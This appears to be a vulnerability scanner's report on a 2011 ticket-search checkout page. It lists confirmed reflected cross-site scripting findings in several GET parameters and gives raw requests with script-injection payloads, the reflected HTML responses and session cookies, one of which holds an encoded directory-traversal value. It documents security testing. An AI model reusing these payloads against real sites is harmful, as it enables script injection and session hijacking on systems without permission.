<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: ''"--></style></script><script>netsparker(0x00003A)</script>', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100724%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET '"--></style></script><script>alert(0x00003B)</script>

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003B)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DUkt6aBjoLb2Zmc2V0af6QnQ%3D%3D--b48262f43859f5c8e1644561f5593ca636246045; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 48
ETag: "d590b6efc9d4112538c9a42a07c64668"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BGIOKaBjoLb2Zmc2V0af6QnQ%3D%3D--e086db6c8f0f4563b647b01ee36ec53d9e458b04; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3573
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', ''"--></style></script><script>netsparker(0x00003B)</script>:pgscheckout','','',{tag:''})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100726%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET '"--></style></script><script>alert(0x00003C)</script>
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
